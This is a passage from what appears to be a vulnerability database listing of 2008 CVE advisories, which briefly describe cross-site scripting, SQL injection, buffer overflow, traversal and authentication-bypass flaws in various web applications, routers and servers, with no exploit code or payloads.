HTML via the PingIPAddr parameter. [CVE-2008-1253] Cross-site scripting (XSS) vulnerability in cgi-bin/webcm on the D-Link DSL-G604T router allows remote attackers to inject arbitrary web script or HTML via the var:category parameter, as demonstrated by a request for advanced/portforw.htm on the fwan page. [CVE-2008-1243] Cross-site scripting (XSS) vulnerability on the Linksys WRT300N router with firmware 2.00.20, when Mozilla Firefox or Apple Safari is used, allows remote attackers to inject arbitrary web script or HTML via the dyndns_domain parameter to the default URI. [CVE-2008-1234] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 2.0.0.13, Thunderbird before 2.0.0.13, and SeaMonkey before 1.1.9 allows remote attackers to inject arbitrary web script or HTML via event handlers, aka "Universal XSS using event handlers." [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method. [CVE-2008-1229] Cross-site scripting (XSS) vulnerability in Edit.jsp in JSPWiki 2.4.104 and 2.5.139 allows remote attackers to inject arbitrary web script or HTML via the editor parameter, a different vector than CVE-2007-5120.b. [CVE-2008-1228] Cross-site scripting (XSS) vulnerability in admin.php in MG2 (formerly Minigal) allows remote attackers to inject arbitrary web script or HTML via the list parameter in an import action. [CVE-2008-1226] Multiple cross-site scripting (XSS) vulnerabilities in Zimbra Collaboration Suite (ZCS) 4.0.3, 4.5.6, and possibly other versions before 4.5.10 allow remote attackers to inject arbitrary web script or HTML via an e-mail attachment, possibly involving a (1) .jpg or (2) .gif image attachment. [CVE-2008-1225] Multiple cross-site scripting (XSS) vulnerabilities in WebCT Campus Edition 4.1.5.8, when "Don't wrap text" is enabled, allow remote authenticated users to inject arbitrary web script or HTML via a (1) mail message or (2) discussion board message. NOTE: this might overlap CVE-2005-1076. [CVE-2008-1224] Cross-site scripting (XSS) vulnerability in account.php in BosClassifieds Classified Ads System 3.0 allows remote attackers to inject arbitrary web script or HTML via the returnTo parameter. NOTE: the provenance of this information is unknown [CVE-2008-1222] Cross-site scripting (XSS) vulnerability in Dokeos 1.8.4 before SP3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1216] IBM Lotus Quickr 8.0 server, and possibly QuickPlace 7.x, does not properly identify URIs containing cross-site scripting (XSS) attack strings, which allows remote attackers to inject arbitrary web script or HTML via a Calendar OpenDocument action to main.nsf with a Count parameter containing a JavaScript event in a malformed element, as demonstrated by an onload event in an IFRAME element. [CVE-2008-1213] Cross-site scripting (XSS) vulnerability in Numara FootPrints for Linux 8.1 allows remote attackers to inject arbitrary web script or HTML via the Title form field when setting an appointment. NOTE: the provenance of this information is unknown [CVE-2008-1212] Cross-site scripting (XSS) vulnerability in set_permissions.php in Podcast Generator 0.96.2 allows remote attackers to inject arbitrary web script or HTML via the scriptlang parameter. NOTE: the provenance of this information is unknown [CVE-2008-1211] Cross-site scripting (XSS) vulnerability in BosDates 3.x and 4.x allows remote attackers to inject arbitrary web script or HTML via (1) the type parameter in calendar.php and (2) the category parameter in calendar_search.php. NOTE: the provenance of this information is unknown [CVE-2008-1209] Cross-site scripting (XSS) vulnerability in redirect.do in Xitex WebContent M1 allows remote attackers to inject arbitrary web script or HTML via the sid parameter. NOTE: the provenance of this information is unknown [CVE-2008-1208] Cross-site scripting (XSS) vulnerability in the login page in Check Point VPN-1 UTM Edge W Embedded NGX 7.0.48x allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2008-1204] Multiple cross-site scripting (XSS) vulnerabilities in the Administration Console in Sun Java System Access Manager 7.1 and 7 2005Q4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the (1) Help and (2) Version windows. [CVE-2008-1203] The administrator interface for Adobe ColdFusion 8 and ColdFusion MX7 does not log failed authentication attempts, which makes it easier for remote attackers to conduct brute force attacks without detection. [CVE-2008-1196] Stack-based buffer overflow in Java Web Start (javaws.exe) in Sun JDK and JRE 6 Update 4 and earlier and 5.0 Update 14 and earlier [CVE-2008-1191] Unspecified vulnerability in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier allows remote attackers to create arbitrary files via an untrusted application, a different issue than CVE-2008-1190, aka "The fifth issue." [CVE-2008-1190] Unspecified vulnerability in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to gain privileges via an untrusted application, a different issue than CVE-2008-1191, aka the "fourth" issue. [CVE-2008-1189] Buffer overflow in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, 5.0 Update 14 and earlier, and SDK/JRE 1.4.2_16 and earlier allows remote attackers to execute arbitrary code via unknown vectors, a different issue than CVE-2008-1188, aka the "third" issue. [CVE-2008-1188] Multiple buffer overflows in the useEncodingDecl function in Java Web Start in Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier, allow remote attackers to execute arbitrary code via a JNLP file with (1) a long key name in the xml header or (2) a long charset value, different issues than CVE-2008-1189, aka "The first two issues." [CVE-2008-1183] Multiple cross-site scripting (XSS) vulnerabilities in Crafty Syntax Live Help (CSLH) before 2.14.6 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) livehelp.php, (2) user_questions.php, and (3) leavemessage.php. NOTE: the lostsheep.php vector is covered by CVE-2008-0848. [CVE-2008-1182] Cross-site scripting (XSS) vulnerability in BSD Perimeter pfSense before 1.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1180] Cross-site scripting (XSS) vulnerability in dana-na/auth/rdremediate.cgi in Juniper Networks Secure Access 2000 5.5 R1 build 11711 allows remote attackers to inject arbitrary web script or HTML via the delivery_mode parameter. [CVE-2008-1179] Multiple cross-site scripting (XSS) vulnerabilities in include/common/javascript/color_picker.php in Centreon 1.4.2.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) title parameters. NOTE: some of these details are obtained from third party information. [CVE-2008-1176] Cross-site scripting (XSS) vulnerability in function/sideblock.php in Affiliate Market (affmarket) 0.1 BETA allows remote attackers to inject arbitrary web script or HTML via the sideblock4 parameter. [CVE-2008-1175] Cross-site scripting (XSS) vulnerability in AuthentiX 6.3b1 Trial allows remote attackers to inject arbitrary web script or HTML via the username parameter to aspAdmin/deleteUser.asp, a different vector than CVE-2008-1174. NOTE: the provenance of this information is unknown [CVE-2008-1174] Cross-site scripting (XSS) vulnerability in editUser.asp in AuthentiX 6.3b1 Trial allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2008-1173] Cross-site scripting (XSS) vulnerability in account-inbox.php in TorrentTrader Classic 1.08 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2008-1168] Cross-site scripting (XSS) vulnerability in Squid Analysis Report Generator (Sarg) 2.2.3.1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent header, which is not properly handled when displaying the Squid proxy log. NOTE: the provenance of this information is unknown [CVE-2008-1165] Multiple cross-site scripting (XSS) vulnerabilities in Flyspray 0.9.9 through 0.9.9.4 allow remote attackers to inject arbitrary web script or HTML via (1) a forced SQL error message or (2) old_value and new_value database fields in task summaries, related to the item_summary parameter in a details action in index.php. NOTE: some of these details are obtained from third party information. [CVE-2008-1162] SQL injection vulnerability in album.php in PHP WEB SCRIPT Dynamic Photo Gallery 1.02 allows remote attackers to execute arbitrary SQL commands via the albumID parameter. [CVE-2008-1153] Cisco IOS 12.1, 12.2, 12.3, and 12.4, with IPv4 UDP services and the IPv6 protocol enabled, allows remote attackers to cause a denial of service (device crash and possible blocked interface) via a crafted IPv6 packet to the device. [CVE-2008-1150] The virtual private dial-up network (VPDN) component in Cisco IOS before 12.3 allows remote attackers to cause a denial of service (resource exhaustion) via a series of PPTP sessions, related to the persistence of interface descriptor block (IDB) data structures after process termination, aka bug ID CSCdv59309. [CVE-2008-1145] Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) "..%5c" (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option. [CVE-2008-1131] Cross-site scripting (XSS) vulnerability in Drupal 6.0 allows remote authenticated users to inject arbitrary web script or HTML via titles in content edit forms. [CVE-2008-1130] Unspecified vulnerability in IBM WebSphere MQ 6.0.x before 6.0.2.2 and 5.3 before Fix Pack 14 allows attackers to bypass access restrictions for a queue manager via a SVRCONN (MQ client) channel. [CVE-2008-1129] Cross-site scripting (XSS) vulnerability in admin/users/self.php in XRMS CRM allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: some of these details are obtained from third party information. [CVE-2008-1116] Insecure method vulnerability in the Web Scan Object ActiveX control (OL2005.dll) in Rising Antivirus Online Scanner allows remote attackers to force the download and execution of arbitrary code by setting the BaseURL property and invoking the UpdateEngine method. NOTE: some of these details are obtained from third party information. [CVE-2008-1106] The management interface in Akamai Client (formerly Red Swoosh) 3322 and earlier allows remote attackers to bypass authentication via an HTTP request that contains (1) no Referer header, or (2) a spoofed Referer header that matches an approved domain, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and force the client to download and execute arbitrary files. [CVE-2008-1098] Multiple cross-site scripting (XSS) vulnerabilities in MoinMoin 1.5.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) certain input processed by formatter/text_gedit.py (aka the gui editor formatter) [CVE-2008-1093] Acresso InstallShield Update Agent does not properly verify the authenticity of Rule Scripts obtained from GetRules.asp web pages on FLEXnet Connect servers, which allows remote man-in-the-middle attackers to execute arbitrary VBScript code via Trojan horse Rules. [CVE-2008-1076] Cross-site scripting (XSS) vulnerability in search.php in Interspire Shopping Cart 1.x allows remote attackers to inject arbitrary web script or HTML via the search_query parameter. NOTE: the provenance of this information is unknown [CVE-2008-1075] Cross-site scripting (XSS) vulnerability in index.php in Maian Cart 1.1 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search command. NOTE: the provenance of this information is unknown [CVE-2008-1068] Multiple PHP remote file inclusion vulnerabilities in Portail Web Php 2.5.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the site_path parameter to (1) Vert/index.php, (2) Noir/index.php, and (3) Bleu/index.php in template/, different vectors than CVE-2008-0645. [CVE-2008-1064] Cross-site scripting (XSS) vulnerability in images.php in the Red Mexico RMSOFT Gallery System (GS) 2.0 module (aka rmgs) for XOOPS allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2008-1063] Cross-site scripting (XSS) vulnerability index.php in the XM-Memberstats (xmmemberstats) module for XOOPS allows remote attackers to inject arbitrary web script or HTML via the sortby parameter. [CVE-2008-1061] Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php [CVE-2008-1055] Format string vulnerability in webmail.exe in NetWin SurgeMail 38k4 and earlier and beta 39a, and WebMail 3.1s and earlier, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in the page parameter. [CVE-2008-1054] Stack-based buffer overflow in the _lib_spawn_user_getpid function in (1) swatch.exe and (2) surgemail.exe in NetWin SurgeMail 38k4 and earlier, and beta 39a, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via an HTTP request with multiple long headers to webmail.exe and unspecified other CGI executables, which triggers an overflow when assigning values to environment variables. NOTE: some of these details are obtained from third party information. [CVE-2008-1048] Cross-site scripting (XSS) vulnerability in manager/xmedia.php in Plume CMS 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the dir parameter. [CVE-2008-1047] Cross-site scripting (XSS) vulnerability in tiki-edit_article.php in TikiWiki before 1.9.10.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-1045] Cross-site scripting (XSS) vulnerability in the file tree navigation function in system/workplace/views/explorer/tree_files.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the resource parameter. [CVE-2008-1043] PHP remote file inclusion vulnerability in templates/default/header.inc.php in Linux Web Shop (LWS) php User Base 1.3 BETA allows remote attackers to execute arbitrary PHP code via a URL in the menu parameter. [CVE-2008-1042] Directory traversal vulnerability in include/body.inc.php in Linux Web Shop (LWS) php Download Manager 1.0 and 1.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the content parameter. [CVE-2008-1041] Cross-site scripting (XSS) vulnerability in mwhois.php in Matt Wilson Matt's Whois (MWhois) allows remote attackers to inject arbitrary web script or HTML via the domain parameter. [CVE-2008-1039] SQL injection vulnerability in question.asp in PORAR WEBBOARD allows remote attackers to execute arbitrary SQL commands via the QID parameter. [CVE-2008-1026] Integer overflow in the PCRE regular expression compiler (JavaScriptCore/pcre/pcre_compile.cpp) in Apple WebKit, as used in Safari before 3.1.1, allows remote attackers to execute arbitrary code via a regular expression with large, nested repetition counts, which triggers a heap-based buffer overflow. [CVE-2008-1025] Cross-site scripting (XSS) vulnerability in Apple WebKit, as used in Safari before 3.1.1, allows remote attackers to inject arbitrary web script or HTML via a crafted URL with a colon in the hostname portion. [CVE-2008-1011] Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via a frame that calls a method instance in another frame. [CVE-2008-1010] Buffer overflow in WebKit, as used in Apple Safari before 3.1, allows remote attackers to execute arbitrary code via crafted regular expressions in JavaScript. [CVE-2008-1009] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary JavaScript by modifying the history object. [CVE-2008-1008] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via the document.domain property. [CVE-2008-1007] WebCore, as used in Apple Safari before 3.1, does not enforce the frame navigation policy for Java applets, which allows remote attackers to conduct cross-site scripting (XSS) attacks. [CVE-2008-1006] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML by using the window.open function to change the security context of a web page. [CVE-2008-1005] WebCore, as used in Apple Safari before 3.1, does not properly mask the password field when reverse conversion is used with the Kotoeri input method, which allows physically proximate attackers to read the password. [CVE-2008-1004] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the Web Inspector. [CVE-2008-1003] Cross-site scripting (XSS) vulnerability in WebCore, as used in Apple Safari before 3.1, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to sites that set the document.domain property or have the same document.domain. [CVE-2008-1002] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1 allows remote attackers to inject arbitrary web script or HTML via a crafted javascript: URL. [CVE-2008-1001] Cross-site scripting (XSS) vulnerability in Apple Safari before 3.1, when running on Windows XP or Vista, allows remote attackers to inject arbitrary web script or HTML via a crafted URL that is not properly handled in the error page. [CVE-2008-0985] Heap-based buffer overflow in the GIF library in the WebKit framework for Google Android SDK m3-rc37a and earlier allows remote attackers to execute arbitrary code via a crafted GIF file whose logical screen height and width are different than the actual height and width. [CVE-2008-0981] Open redirect vulnerability in spyce/examples/redirect.spy in Spyce - Python Server Pages (PSP) 2.1.3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter. [CVE-2008-0980] Multiple cross-site scripting (XSS) vulnerabilities in Spyce - Python Server Pages (PSP) 2.1.3 allow remote attackers to inject arbitrary web script or HTML via (1) the url or type parameter to docs/examples/redirect.spy [CVE-2008-0971] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in Barracuda Spam Firewall (BSF) before 3.5.12.007, Message Archiver before 1.2.1.002, Web Filter before 3.3.0.052, IM Firewall before 3.1.01.017, and Load Balancer before 2.3.024 allow remote attackers to inject arbitrary web script or HTML via (1) the Policy Name field in Search Based Retention Policy in Message Archiver [CVE-2008-0963] Format string vulnerability in EMC DiskXtender MediaStor 6.20.060 allows remote authenticated users to execute arbitrary code via a crafted message to the RPC interface. [CVE-2008-0962] Stack-based buffer overflow in the File System Manager for EMC DiskXtender 6.20.060 allows remote authenticated users to execute arbitrary code via a crafted request to the RPC interface. [CVE-2008-0961] EMV DiskXtender 6.20.060 has a hard-coded login and password, which allows remote attackers to bypass authentication via the RPC interface. [CVE-2008-0956] Multiple stack-based buffer overflows in the BackWeb Lite Install Runner ActiveX control in the BackWeb Web Package ActiveX object in LiteInstActivator.dll in BackWeb before 8.1.1.87, as used in Logitech Desktop Manager (LDM) before 2.56, allow remote attackers to execute arbitrary code via unspecified vectors. [CVE-2008-0943] Multiple SQL injection vulnerabilities in Eagle Software Aeries Browser Interface (ABI) 3.7.2.2 allow remote attackers to execute arbitrary SQL commands via the (1) FC parameter to Comments.asp, or the Term parameter to (2) Labels.asp or (3) ClassList.asp. [CVE-2008-0942] SQL injection vulnerability in GradebookStuScores.asp in Eagle Software Aeries Browser Interface (ABI) 3.8.2.8 allows remote attackers to execute arbitrary SQL commands via the GrdBk parameter. [CVE-2008-0940] Cross-site scripting (XSS) vulnerability in Plain Black WebGUI before 7.4.24 allows remote attackers to inject arbitrary web script or HTML when creating a username, a different vulnerability than CVE-2007-0407. [CVE-2008-0926] The SOAP interface to the eMBox module in Novell eDirectory 8.7.3.9 and earlier, and 8.8.x before 8.8.2, relies on client-side authentication, which allows remote attackers to bypass authentication via requests for /SOAP URIs, and cause a denial of service (daemon shutdown) or read arbitrary files. NOTE: it was later reported that 8.7.3.10 (aka 8.7.3 SP10) is also affected. [CVE-2008-0919] Cross-site scripting (XSS) vulnerability in session/login.php in Open Source Security Information Management (OSSIM) 0.9.9 rc5 and earlier allows remote attackers to inject arbitrary web script or HTML via the dest parameter. [CVE-2008-0917] Cross-site scripting (XSS) vulnerability in Tor World Tor Search 1.1 and earlier, I-Navigator 4.0, Mobile Frontier 2.1 and earlier, Diary.cgi (aka Quotes of the Day) 1.5 and earlier, Tor News 1.21 and earlier, Simple BBS 1.3 and earlier, Interactive BBS 1.3 and earlier, Tor Board 1.1 and earlier, Simple Vote 1.1 and earlier, and Com Vote 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0914] Multiple cross-site scripting (XSS) vulnerabilities in the Mediation server in IPdiva SSL VPN Server 2.2 before 2.2.8.84 and 2.3 before 2.3.2.14 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0913] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB or IP.Board) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via crafted BBCodes in an unspecified context. [CVE-2008-0909] Cross-site scripting (XSS) vulnerability in browse.asp in Schoolwires Academic Portal allows remote attackers to inject arbitrary web script or HTML via the c parameter. NOTE: the provenance of this information is unknown [CVE-2008-0903] Unspecified vulnerability in the BEA WebLogic Server and Express proxy plugin, as distributed before November 2007 and before 9.2 MP3 and 10.0 MP2, allows remote attackers to cause a denial of service (web server crash) via a crafted URL. [CVE-2008-0902] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Server and Express 6.1 through 10.0 MP1 allow remote attackers to inject arbitrary web script or HTML via unspecified samples. NOTE: this might be the same issue as CVE-2007-2694. [CVE-2008-0901] BEA WebLogic Server and Express 7.0 through 10.0 allows remote attackers to conduct brute force password guessing attacks, even when account lockout has been activated, via crafted URLs that indicate whether a guessed password is successful or not. [CVE-2008-0900] Session fixation vulnerability in BEA WebLogic Server and Express 8.1 SP4 through SP6, 9.2 through MP1, and 10.0 allows remote authenticated users to hijack web sessions via unknown vectors. [CVE-2008-0899] Cross-site scripting (XSS) vulnerability in the Administration Console in BEA WebLogic Server and Express 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via URLs that are not properly handled by the Unexpected Exception Page. [CVE-2008-0898] The distributed queue feature in JMS in BEA WebLogic Server 9.0 through 10.0, in certain configurations, does not properly handle when a client cannot send a message to a member of a distributed queue, which allows remote authenticated users to bypass intended access restrictions for protected distributed queues. [CVE-2008-0897] Unspecified vulnerability in BEA WebLogic Server 9.0 through 10.0 allows remote authenticated users without "receive" permissions to bypass intended access restrictions and receive messages from a standalone JMS Topic or secured Distributed Topic member destination, related to durable subscriptions. [CVE-2008-0896] BEA WebLogic Portal 10.0 and 9.2 through MP1, when an administrator deletes a single instance of a content portlet, removes entitlement policies for other content portlets, which allows attackers to bypass intended access restrictions. [CVE-2008-0895] BEA WebLogic Server and WebLogic Express 6.1 through 10.0 allows remote attackers to bypass authentication for application servlets via crafted request headers. [CVE-2008-0879] SQL injection vulnerability in modules.php in the Web_Links module for PHP-Nuke allows remote attackers to execute arbitrary SQL commands via the cid parameter in a viewlink action. [CVE-2008-0877] Multiple cross-site scripting (XSS) vulnerabilities in Jinzora Media Jukebox 2.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) frontend, (2) set_frontend, (3) jz_path, (4) theme, and (5) set_theme parameters to (a) index.php [CVE-2008-0872] Cross-site scripting (XSS) vulnerability in SmarterTools SmarterMail Enterprise 4.3 allows remote attackers to inject arbitrary web script or HTML via a STYLE attribute of an element in the Subject field of an e-mail message. [CVE-2008-0870] BEA WebLogic Portal 10.0 and 9.2 through Maintenance Pack 2, under certain circumstances, can redirect a user from the https:// URI for the Portal Administration Console to an http URI, which allows remote attackers to sniff the session. [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows. [CVE-2008-0868] Cross-site scripting (XSS) vulnerability in Groupspace in BEA WebLogic Portal 10.0 and 9.2 through Maintenance Pack 1 allows remote authenticated users to inject arbitrary web script or HTML via unknown vectors. [CVE-2008-0867] Cross-site scripting (XSS) vulnerability in portal/server.pt in BEA AquaLogic Interaction 6.1 through MP1 and Plumtree Foundation 6.0 through SP1 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2008-0866] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Workshop allow remote attackers to inject arbitrary web script or HTML via an invalid action URI, which is not properly handled by NetUI page flows. [CVE-2008-0865] Unspecified vulnerability in BEA WebLogic Portal 8.1 through SP6 allows remote attackers to bypass entitlements for instances of a floatable WLP portlet via unknown vectors. [CVE-2008-0864] Admin Tools in BEA WebLogic Portal 8.1 SP3 through SP6 can inadvertently remove entitlements for pages when an administrator edits the page definition label, which might allow remote attackers to bypass intended access restrictions. [CVE-2008-0863] BEA WebLogic Server and WebLogic Express 9.0 and 9.1 exposes the web service's WSDL and security policies, which allows remote attackers to obtain sensitive information and potentially launch further attacks. [CVE-2008-0861] Cross-site scripting (XSS) vulnerability in leg/Main.nsf in IBM Lotus Quickplace 7.0 allows remote attackers to inject arbitrary web script or HTML via an h_SearchString sub-parameter in the PreSetFields parameter of an EditDocument action. [CVE-2008-0851] Multiple cross-site scripting (XSS) vulnerabilities in Dokeos 1.8.4 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to inscription.php, (2) courseCode parameter to main/calendar/myagenda.php, (3) category parameter to main/admin/course_category.php, (4) message parameter to main/admin/session_list.php in a show_message action, and (5) an avatar image to main/auth/profile.php. [CVE-2008-0848] Cross-site scripting (XSS) vulnerability in lostsheep.php in Crafty Syntax Live Help (CSLH) before 2.14.16, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the versions claimed by the original researcher are probably incorrect. [CVE-2008-0837] Cross-site scripting (XSS) vulnerability in the log feature in the John Godley Search Unleashed 0.2.10 plugin for WordPress allows remote attackers to inject arbitrary web script or HTML via the s parameter, which is not properly handled when the administrator views the log file. [CVE-2008-0834] Cross-site scripting (XSS) vulnerability in Lotus Quickr for i5/OS before 8.0.0.2 Hotfix 11, when anonymous access is disabled on HTTP ports, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0828] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) attributes such as style and onmouseover in (a) forum post or (b) mail [CVE-2008-0826] Cross-site scripting (XSS) vulnerability in Claroline before 1.8.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2008-0820] * DISPUTED Cross-site scripting (XSS) vulnerability in index.php in Etomite 0.6.1.4 Final allows remote attackers to inject arbitrary web script or HTML via $_SERVER['PHP_INFO']. NOTE: the vendor disputes this issue in a followup, stating that the affected variable is $_SERVER['PHP_SELF'], and "This is not an Etomite specific exploit and I would like the report rescinded." [CVE-2008-0813] Directory traversal vulnerability in Download.php in XPWeb 3.0.1, 3.3.2, and possibly other versions, allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter. [CVE-2008-0809] Cross-site scripting (XSS) vulnerability in the htmlscrubber in Ikiwiki before 1.1.46 allows remote attackers to inject arbitrary web script or HTML via title contents. [CVE-2008-0808] Cross-site scripting (XSS) vulnerability in the meta plugin in Ikiwiki before 1.1.47 allows remote attackers to inject arbitrary web script or HTML via meta tags. [CVE-2008-0807] lib/Driver/sql.php in Turba 2 (turba2) Contact Manager H3 2.1.x before 2.1.7 and 2.2.x before 2.2-RC3, as used in products such as Horde Groupware before 1.0.4 and Horde Groupware Webmail Edition before 1.0.5, does not properly check access rights, which allows remote authenticated users to modify address data via a modified object_id parameter to edit.php, as demonstrated by modifying a personal address book entry when there is write access to a shared address book. [CVE-2008-0798] Multiple directory traversal vulnerabilities in artmedic webdesign weblog 1.0, when magic_quotes_gpc is disabled, allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) ta parameter to artmedic_index.php, reached through index.php [CVE-2008-0793] Multiple cross-site scripting (XSS) vulnerabilities in search.asp in Tendenci CMS allow remote attackers to inject arbitrary web script or HTML via the (1) category, (2) searchtext, (3) jobcategoryid, (4) contactcompany, and unspecified other parameters. NOTE: some of these details are obtained from third party information. NOTE: it is not clear whether this affects Tendenci Enterprise Edition in addition to the product's deployment on Tendenci's own server farm. If only the latter was affected, then this issue should not be included in CVE. [CVE-2008-0783] Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.7 before 0.8.7b and 0.8.6 before 0.8.6k allow remote attackers to inject arbitrary web script or HTML via (1) the view_type parameter to graph.php [CVE-2008-0781] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin 1.5.8 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) message, (2) pagename, and (3) target filenames. [CVE-2008-0780] Cross-site scripting (XSS) vulnerability in MoinMoin 1.5.x through 1.5.8 and 1.6.x before 1.6.1 allows remote attackers to inject arbitrary web script or HTML via the login action. [CVE-2008-0775] Cross-site scripting (XSS) vulnerability in sboxDB.php in Simple Machines Forum (SMF) Shoutbox 1.14 through 1.16b allows remote attackers to inject arbitrary web script or HTML via strings to the shoutbox form that start with "&#", contain the desired script, and end with " [CVE-2008-0774] Cross-site scripting (XSS) vulnerability in search.cgi in Loris Hotel Reservation System 3.01 and possibly earlier allows remote attackers to inject arbitrary web script or HTML via the hotel_name parameter. NOTE: the provenance of this information is unknown [CVE-2008-0769] Cross-site scripting (XSS) vulnerability in Livelink ECM 9.0.0 through 9.7.0 and possibly earlier does not set the charset, which allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded input. [CVE-2008-0765] Multiple cross-site scripting (XSS) vulnerabilities in artmedic webdesign weblog allow remote attackers to inject arbitrary web script or HTML via the (1) date parameter to artmedic_print.php and the (2) jahrneu parameter to index.php. [CVE-2008-0757] Cross-site scripting (XSS) vulnerability in index.php in MercuryBoard 1.1.5 allows remote attackers to inject arbitrary web script or HTML via the message parameter (aka the message text area), which leads to an injection in the messenger during private message (PM) preview. NOTE: some of these details are obtained from third party information. [CVE-2008-0751] Cross-site scripting (XSS) vulnerability in the Freetag before 2.96 plugin for S9Y Serendipity, when using Internet Explorer 6 or 7, allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to plugin/tag/. [CVE-2008-0749] Cross-site scripting (XSS) vulnerability in index.php in Calimero.CMS 3.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter in a calimero_webpage action. [CVE-2008-0741] Unspecified vulnerability in the PropFilePasswordEncoder utility in IBM WebSphere Application Server (WAS) before 6.0.2 Fix Pack 25 (6.0.2.25) has unknown impact and attack vectors. [CVE-2008-0740] IBM WebSphere Application Server (WAS) before 6.0.2 Fix Pack 25 (6.0.2.25) and 6.1 before Fix Pack 15 (6.1.0.15) writes unspecified cleartext information to http_plugin.log, which might allow local users to obtain sensitive information by reading this file. [CVE-2008-0723] Cross-site scripting (XSS) vulnerability in mynews.inc.php in MyNews 1.6.4, and other earlier 1.6.x versions, allows remote attackers to inject arbitrary web script or HTML via the hash parameter in an admin action to index.php, a different vulnerability than CVE-2006-2208.1. [CVE-2008-0722] Cross-site scripting (XSS) vulnerability in index.php in Pagetool 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the search_term parameter in a pagetool_search action. NOTE: the provenance of this information is unknown [CVE-2008-0720] Cross-site scripting (XSS) vulnerability in Webmin 1.370 and 1.390 and Usermin 1.300 and 1.320 allows remote attackers to inject arbitrary web script or HTML via the search parameter to webmin_search.cgi (aka the search section), and possibly other components accessed through a "search box" or "open file box." NOTE: some of these details are obtained from third party information. [CVE-2008-0717] Cross-site scripting (XSS) vulnerability in Caching Proxy (CP) 5.1 through 6.1 in IBM WebSphere Edge Server, when CGI mapping rules are enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors that trigger injection into an error response. 